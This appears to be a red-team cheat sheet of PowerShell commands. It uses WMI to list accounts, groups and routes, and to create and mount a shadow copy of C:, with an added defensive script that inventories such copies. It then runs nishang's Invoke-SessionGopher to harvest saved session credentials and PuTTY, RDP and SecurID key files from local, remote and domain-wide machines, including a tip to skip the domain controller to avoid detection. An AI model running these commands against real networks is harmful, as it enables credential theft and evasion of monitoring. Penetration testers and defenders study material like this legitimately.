Red Team WMI

PS C:\> Get-WmiObject -Class win32_IP4RouteTable

PS C:\> Get-WmiObject -Class win32_useraccount

PS C:\> Get-WmiObject -Class win32_group

PS C:\> Get-WmiObject -Class win32_shadowcopy

PS C:\> (Get-WmiObject -Class win32_shadowcopy -List).Create("c:\", "ClientAccessible")

PS C:\> $link = (Get-WmiObject -Class win32_shadowcopy).DeviceObject + "\"

PS C:\> cmd /c mklink /d c:\shadowcopy "$link"
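The shadow copy steps above seen from the defender's side, as an added example that is not part of the original cheat sheet: it lists the existing shadow copies with their age, volume and origin, and finds directory links that point into one, so an unexpected copy or link stands out. It assumes Windows PowerShell 5.1 or later run as administrator; the 24-hour threshold, the scan root and the scan depth are assumed defaults, not values from the page.

```powershell
# Added defender-side example, not from the original page: inventory the shadow copies
# and the directory links that the Win32_ShadowCopy commands above leave behind.
# Assumes Windows PowerShell 5.1+ run as administrator; thresholds below are assumed.

function Get-ShadowCopyInventory {
    param([int]$RecentHours = 24)   # copies newer than this are flagged as Recent
    $now     = Get-Date
    $volumes = Get-WmiObject -Class Win32_Volume
    foreach ($sc in @(Get-WmiObject -Class Win32_ShadowCopy)) {
        # InstallDate is a CIM datetime string; convert it to a .NET DateTime
        $created = [System.Management.ManagementDateTimeConverter]::ToDateTime($sc.InstallDate)
        # VolumeName holds the \\?\Volume{GUID}\ id; map it back to a drive letter
        $vol     = $volumes | Where-Object { $_.DeviceID -eq $sc.VolumeName }
        [pscustomobject]@{
            ID               = $sc.ID
            Created          = $created
            Recent           = (($now - $created).TotalHours -le $RecentHours)
            DriveLetter      = $vol.DriveLetter
            DeviceObject     = $sc.DeviceObject       # the path a mklink /d would point at
            ClientAccessible = $sc.ClientAccessible   # context used by the Create() call above
            Persistent       = $sc.Persistent
            Origin           = $sc.OriginatingMachine
        }
    }
}

function Find-ShadowCopyLink {
    param([string[]]$Root = @('C:\'), [int]$Depth = 2)
    foreach ($r in $Root) {
        # Directory reparse points (symlinks, junctions) whose target is a shadow copy device
        Get-ChildItem -Path $r -Attributes 'Directory+ReparsePoint' -Recurse -Depth $Depth -ErrorAction SilentlyContinue |
            Where-Object { ($_.Target -join ';') -match 'HarddiskVolumeShadowCopy' } |
            Select-Object FullName, LinkType, @{ n = 'Target'; e = { $_.Target -join ';' } }
    }
}

# Usage: newest shadow copies first, then any links into them
Get-ShadowCopyInventory | Sort-Object Created -Descending | Format-Table -AutoSize
Find-ShadowCopyLink | Format-Table -AutoSize
```

A copy whose Origin is not the local machine name, or a link found outside a known backup location, is the kind of entry worth following up.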

Gather information from the local box:

Invoke-SessionGopher.ps1:

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Gather> . .\Invoke-SessionGopher.ps1

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Gather> Invoke-SessionGopher -Verbose

Gather information from a remote box:

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Gather> Invoke-SessionGopher -computername 192.168.222.144 -credential SECURITY\administrator

Gather information from all machines in the domain:

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Gather> Invoke-SessionGopher -Credential SECURITY\administrator -AllDomain

Gather information from all machines in the domain but exclude the DC from the list to avoid detection:

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Gather> Invoke-SessionGopher -Credential SECURITY\administrator -AllDomain -ExcludeDC

If thorough mode is used, the filesystem of the target machine is searched for PuTTY private key files (.ppk), RDP files (.rdp) and RSA SecurID token files (.sdtid).

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Gather> Invoke-SessionGopher -Thorough

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Gather> Invoke-SessionGopher -Verbose -Computername 192.168.222.144

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Gather> Invoke-SessionGopher -Verbose -AllDomain

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Gather> Invoke-SessionGopher -Verbose -AllDomain -ExcludeDC

@Saksham Dixit